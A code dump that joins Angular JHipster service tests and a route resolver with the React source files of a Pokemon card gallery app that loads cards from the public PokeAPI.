      it('should find an element', () => {
        const returnedFromService = Object.assign({}, elemDefault);

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        // Flush the mocked backend, then inspect what the service emitted.
        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a RegionMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.create(new RegionMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a RegionMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            regionName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a RegionMySuffix', () => {
        // PATCH sends only the changed fields.
        const patchObject = Object.assign({}, new RegionMySuffix());

        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign({}, returnedFromService);

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of RegionMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            regionName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a RegionMySuffix', () => {
        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        expect(expectedResult);
      });

      describe('addRegionMySuffixToCollectionIfMissing', () => {
        it('should add a RegionMySuffix to an empty array', () => {
          const region: IRegionMySuffix = { id: 'ABC' };
          expectedResult = service.addRegionMySuffixToCollectionIfMissing([], region);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(region);
        });

        it('should not add a RegionMySuffix to an array that contains it', () => {
          const region: IRegionMySuffix = { id: 'ABC' };
          const regionCollection: IRegionMySuffix[] = [
            {
              ...region,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, region);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a RegionMySuffix to an array that doesn't contain it", () => {
          const region: IRegionMySuffix = { id: 'ABC' };
          const regionCollection: IRegionMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, region);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(region);
        });

        it('should add only unique RegionMySuffix to an array', () => {
          const regionArray: IRegionMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'driver paradigms Plastic' }];
          const regionCollection: IRegionMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, ...regionArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const region: IRegionMySuffix = { id: 'ABC' };
          const region2: IRegionMySuffix = { id: 'CBA' };
          expectedResult = service.addRegionMySuffixToCollectionIfMissing([], region, region2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(region);
          expect(expectedResult).toContain(region2);
        });

        it('should accept null and undefined values', () => {
          const region: IRegionMySuffix = { id: 'ABC' };
          expectedResult = service.addRegionMySuffixToCollectionIfMissing([], null, region, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(region);
        });
      });
    });

    afterEach(() => {
      // Ensure no unexpected HTTP calls remain outstanding.
      httpMock.verify();
    });
  });
});
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
/**
 * Route resolver for LocationMySuffix: fetches the entity for the routed id,
 * yields a blank entity when no id is present, and redirects to the 404 page
 * when the backend returns no body.
 */
@Injectable({ providedIn: 'root' })
export class LocationMySuffixRoutingResolveService implements Resolve<ILocationMySuffix> {
  constructor(protected service: LocationMySuffixService, protected router: Router) {}

  resolve(route: ActivatedRouteSnapshot): Observable<ILocationMySuffix> | Observable<never> {
    const id = route.params['id'];
    if (!id) {
      // No id in the route: this is the "create" flow — hand out a blank entity.
      return of(new LocationMySuffix());
    }
    return this.service.find(id).pipe(
      mergeMap((location: HttpResponse<LocationMySuffix>) => {
        if (!location.body) {
          // Unknown id: send the user to the 404 page and complete silently.
          this.router.navigate(['404']);
          return EMPTY;
        }
        return of(location.body);
      })
    );
  }
}
| c760b70e87cc7459f0932507494afa05df86bf7a | [
"TypeScript"
] | 57 | TypeScript | arshamsedaghatbin/jhipster-sample-applicationsiavash | 6b63f0cce53f87257f89977bb3d591275b685277 | 91fdf4989f99647f6904722089c19e252d19f3fd |
refs/heads/master | <repo_name>Ambitious156288/Pokemon-Cards-Collection<file_sep>/src/context/InputContext.js
import React, { createContext, useState } from 'react';
import PropTypes from 'prop-types';
const InputContext = createContext();
const InputProvider = ({ children }) => {
const [inputValue, setInputValue] = useState('');
const [quantity, setQuantity] = useState(10);
const [counter, setCounter] = useState(0);
const [toggle, setToggle] = useState(false);
const handleToggle = () => {
setToggle(!toggle);
};
const handleInput = e => {
setInputValue(e.target.value);
};
const handleQuantity = () => {
setQuantity(quantity + 10);
setCounter(counter + 1);
if (counter === 2) setQuantity(quantity + 120);
};
return (
<InputContext.Provider
value={{
inputValue,
handleInput,
quantity,
handleQuantity,
counter,
toggle,
handleToggle,
}}
>
{children}
</InputContext.Provider>
);
};
InputProvider.propTypes = {
children: PropTypes.element.isRequired,
};
export { InputProvider, InputContext };
<file_sep>/src/views/Root/Root.js
import React from 'react';
import 'bootstrap/dist/css/bootstrap.min.css';
import { ThemeProvider } from 'styled-components';
import { theme } from 'theme/theme';
import Backgroud from 'theme/Background';
import Header from 'components/Header/Header';
import { InputProvider } from 'context/InputContext';
import Show from 'components/PokemonCatalog/Show';
const Root = () => {
return (
<ThemeProvider theme={theme}>
<InputProvider>
<Backgroud />
<Header />
<Show />
</InputProvider>
</ThemeProvider>
);
};
export default Root;
<file_sep>/src/components/Header/Input.js
import React, { useContext } from 'react';
import { withStyles } from '@material-ui/core/styles';
import TextField from '@material-ui/core/TextField';
import { InputContext } from 'context/InputContext';
const CssTextField = withStyles({
root: {
'& label.Mui-focused': {
color: 'green',
},
'& .MuiInput-underline:after': {
borderBottomColor: 'green',
},
},
})(TextField);
const Input = () => {
const { inputValue, handleInput, toggle } = useContext(InputContext);
return (
<>
{toggle && (
<form noValidate>
<CssTextField
id="custom-css-standard-input"
label="search by name"
value={inputValue}
onChange={handleInput}
/>
</form>
)}
</>
);
};
export default Input;
<file_sep>/src/theme/Background.js
import { createGlobalStyle } from 'styled-components';
import backgroundImage from 'assets/backgroundImage.png';
// Global stylesheet: loads the Roboto font and pins the pokemon background
// image (under a faint white overlay) to the viewport.
const Background = createGlobalStyle`
@import url('https://fonts.googleapis.com/css2?family=Roboto&display=swap');
body{
font-family: 'Roboto', sans-serif;
background: linear-gradient(rgba(255,255,255,.1), rgba(255,255,255,.1)), url(${backgroundImage}) center;
background-attachment: fixed;
}
`;

export default Background;
<file_sep>/src/components/PokemonCatalog/Show.js
import React, { useContext } from 'react';
import styled from 'styled-components';
import Button from '@material-ui/core/Button';
import PokemonsList from 'components/PokemonCatalog/PokemonsList';
import { InputContext } from 'context/InputContext';
const StyledButton = styled.div`
position: absolute;
top: 16%;
left: 50%;
transform: translate(-50%, 0);
`;
const Show = () => {
const { toggle, handleToggle } = useContext(InputContext);
return (
<>
<StyledButton>
<Button variant="contained" color="primary" onClick={handleToggle}>
{toggle ? 'Hide' : 'Show'} Cards
</Button>
</StyledButton>
{toggle && <PokemonsList />}
</>
);
};
export default Show;
<file_sep>/src/components/PokemonCatalog/PokemonsList.js
import React, { useState, useEffect, useContext } from 'react';
import axios from 'axios';
import styled from 'styled-components';
import BootstrapSwitchButton from 'bootstrap-switch-button-react';
import { InputContext } from 'context/InputContext';
import { Button } from 'react-bootstrap';
import PokemonCard from './PokemonCard';
const StyledMargin = styled.div`
margin-top: 100px;
text-align: center;
`;
const StyledGallery = styled.div`
display: grid;
grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
gap: 30px;
margin: 0 20px;
margin-top: 70px;
margin-bottom: 70px;
justify-items: center;
`;
const StyledCenter = styled.div`
text-align: center;
margin: 100px;
`;
const getPokemons = () => {
const { quantity, handleQuantity, counter, inputValue } = useContext(InputContext);
const API_URL = 'https://pokeapi.co/api';
const VERSION = 'v2';
const RESOURCE = 'pokemon?limit=';
const API_ENDPOINT = `${API_URL}/${VERSION}/${RESOURCE}${quantity}`;
const [pokemons, setPokemons] = useState([]);
const [flag, setFlag] = useState(false);
const [color, setColor] = useState('dark');
useEffect(() => {
axios.get(API_ENDPOINT).then(res => {
setPokemons(res.data.results);
});
}, [pokemons]);
return (
<>
<StyledMargin>
<BootstrapSwitchButton
onstyle="dark"
width={160}
onlabel=" Dark Cards"
offlabel=" Light Cards"
onChange={() => {
setColor(flag ? 'dark' : 'light');
setFlag(!flag);
}}
/>
</StyledMargin>
<StyledGallery>
{pokemons.map(
item =>
item.name.includes(inputValue) && (
<PokemonCard key={item.id} name={item.name} url={item.url} theme={color} />
),
)}
</StyledGallery>
<StyledCenter>
{counter === 3 ? null : (
<Button size="lg" variant="warning" onClick={handleQuantity}>
{counter === 2 ? 'show all' : 'load more'}
</Button>
)}
</StyledCenter>
</>
);
};
export default getPokemons;
<file_sep>/src/components/Header/Triangle.js
import React from 'react';
import styled from 'styled-components';
const StyledTriangle = styled.div`
position: absolute;
top: 0;
left: 50%;
transform: translate(-50%, 0);
width: 0;
height: 0;
border-left: 400px solid transparent;
border-right: 400px solid transparent;
border-top: 180px solid ${({ theme }) => theme.green};
`;
const Triangle = () => <StyledTriangle />;
export default Triangle;
| ff1e8e2eb146f17b8b51f958b8a7f52bb17ffb98 | [
"JavaScript"
] | 7 | JavaScript | Ambitious156288/Pokemon-Cards-Collection | e1d641467a73ce7a58f9a780a41748b980b8f5ca | e7c87b5d4a4cab406055c5b222e107f32526a481 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.